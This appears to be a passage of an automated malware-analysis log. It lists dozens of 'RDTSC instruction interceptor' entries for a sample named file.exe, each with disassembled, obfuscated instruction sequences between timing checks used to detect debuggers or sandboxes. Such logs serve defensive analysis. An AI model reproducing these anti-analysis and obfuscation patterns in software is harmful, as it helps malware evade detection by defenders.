Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A992 second address: A7AA0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jc 00007FD4C8DA2148h 0x00000012 mov edx, esi 0x00000014 push 00000000h 0x00000016 jmp 00007FD4C8DA2151h 0x0000001b push 4EB5D752h 0x00000020 jnp 00007FD4C8DA214Ah 0x00000026 xor dword ptr [esp], 4EB5D7D2h 0x0000002d jmp 00007FD4C8DA2153h 0x00000032 push 00000003h 0x00000034 mov dx, E882h 0x00000038 xor dword ptr [ebp+122D1F61h], edi 0x0000003e push 00000000h 0x00000040 add dword ptr [ebp+122D1830h], edx 0x00000046 push 00000003h 0x00000048 add edx, dword ptr [ebp+122D37E4h] 0x0000004e push 67C8C539h 0x00000053 pushad 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A67C13 second address: A67C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98644 second address: A98649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98649 second address: A9864E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9864E second address: A9868C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD4C8DA2146h 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD4C8DA214Eh 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007FD4C8DA215Dh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9868C second address: A9869E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C3Dh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9869E second address: A986A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9894A second address: A98969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8509C48h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98969 second address: A9896F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98B04 second address: A98B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98B08 second address: A98B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FD4C8DA2148h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 je 00007FD4C8DA2146h 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jnl 00007FD4C8DA214Ah 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 pushad 0x00000027 popad 0x00000028 jmp 00007FD4C8DA214Fh 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98C96 second address: A98CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD4C8509C36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FD4C8509C36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98CA9 second address: A98CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98FC9 second address: A98FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98FCD second address: A98FE4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD4C8DA2146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d jg 00007FD4C8DA2158h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98FE4 second address: A98FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98FE8 second address: A98FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99458 second address: A99470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8509C42h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99470 second address: A994A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD4C8DA2159h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD4C8DA2159h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99621 second address: A9963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8509C46h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9963F second address: A9966F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FD4C8DA215Eh 0x0000000e jmp 00007FD4C8DA2158h 0x00000013 jnp 00007FD4C8DA214Ah 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99853 second address: A9985D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD4C8509C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9985D second address: A99869 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jng 00007FD4C8DA2146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99869 second address: A99875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD4C8509C36h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A999A6 second address: A999AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A999AA second address: A999B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A999B0 second address: A999C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jnc 00007FD4C8DA2146h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A999C3 second address: A999DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C45h 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F651 second address: A5F655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9A499 second address: A9A49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9A49F second address: A9A4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9D415 second address: A9D41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA0706 second address: AA070B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA070B second address: AA0734 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD4C8509C38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jc 00007FD4C8509C42h 0x00000012 je 00007FD4C8509C3Ch 0x00000018 jnc 00007FD4C8509C36h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F6DC second address: A9F6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA0801 second address: AA080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA080E second address: AA0855 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD4C8DA2148h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jnp 00007FD4C8DA2150h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007FD4C8DA2151h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FD4C8DA214Bh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA0855 second address: AA085A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3B1A second address: AA3B1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3B1F second address: AA3B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FD4C8509C43h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3B3F second address: AA3B45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3B45 second address: AA3B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3B4E second address: AA3B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD4C8DA2146h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6973B second address: A6973F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6973F second address: A69763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Ch 0x00000007 jmp 00007FD4C8DA214Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69763 second address: A69767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69767 second address: A6976B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6976B second address: A69771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69771 second address: A69779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA783F second address: AA7843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7843 second address: AA7849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7F9F second address: AA7FA5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA901F second address: AA9026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9026 second address: AA9043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FD4C8509C36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9043 second address: AA9047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA92AE second address: AA92B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA939D second address: AA93A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD4C8DA2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA948A second address: AA94AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA94AA second address: AA94AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA94AF second address: AA94B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD4C8509C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9571 second address: AA9576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9653 second address: AA9678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8509C49h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9C19 second address: AA9C1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9CE6 second address: AA9CF4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9CF4 second address: AA9CF9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAA145 second address: AAA14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAA735 second address: AAA750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAA750 second address: AAA754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAC1AA second address: AAC1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8DA214Dh 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAC1BF second address: AAC1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8509C3Bh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5A5AF second address: A5A5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5A5B7 second address: A5A5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 push edx 0x00000009 jnp 00007FD4C8509C52h 0x0000000f jmp 00007FD4C8509C46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAD920 second address: AAD926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAD926 second address: AAD9C4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD4C8509C4Ch 0x00000008 jmp 00007FD4C8509C46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 call 00007FD4C8509C49h 0x00000015 sbb di, 0E61h 0x0000001a pop esi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FD4C8509C38h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov dword ptr [ebp+1245B005h], edx 0x0000003d xor esi, dword ptr [ebp+122D1FBFh] 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007FD4C8509C38h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 0000001Ch 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f mov esi, eax 0x00000061 push eax 0x00000062 js 00007FD4C8509C3Eh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAE100 second address: AAE107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAFE29 second address: AAFE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAE107 second address: AAE10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB04C3 second address: AB04C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB2529 second address: AB252D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB17FE second address: AB1810 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD4C8509C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB2276 second address: AB2289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4C8DA214Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB9CFE second address: AB9D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB9D04 second address: AB9D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABB1C7 second address: ABB1D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD4C8509C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABB1D1 second address: ABB1DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD4C8DA2146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABA468 second address: ABA525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push esi 0x00000008 jne 00007FD4C8509C3Ch 0x0000000e pop esi 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FD4C8509C38h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a jmp 00007FD4C8509C44h 0x0000002f mov ebx, dword ptr [ebp+122D3AB8h] 0x00000035 push dword ptr fs:[00000000h] 0x0000003c xor ebx, 53B6824Eh 0x00000042 jmp 00007FD4C8509C3Ah 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e xor dword ptr [ebp+122D27BFh], eax 0x00000054 mov eax, dword ptr [ebp+122D1635h] 0x0000005a mov dword ptr [ebp+12486306h], ebx 0x00000060 push FFFFFFFFh 0x00000062 nop 0x00000063 push edi 0x00000064 pushad 0x00000065 jmp 00007FD4C8509C41h 0x0000006a jnc 00007FD4C8509C36h 0x00000070 popad 0x00000071 pop edi 0x00000072 push eax 0x00000073 pushad 0x00000074 pushad 0x00000075 jne 00007FD4C8509C36h 0x0000007b jmp 00007FD4C8509C44h 0x00000080 popad 0x00000081 push eax 0x00000082 push edx 0x00000083 pushad 0x00000084 popad 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABB1DC second address: ABB256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FD4C8DA2157h 0x0000000d nop 0x0000000e mov dword ptr [ebp+12482F43h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FD4C8DA2148h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 sub dword ptr [ebp+1246E244h], edi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FD4C8DA2148h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov di, dx 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FD4C8DA214Ah 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABB256 second address: ABB25B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABB3A0 second address: ABB3A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
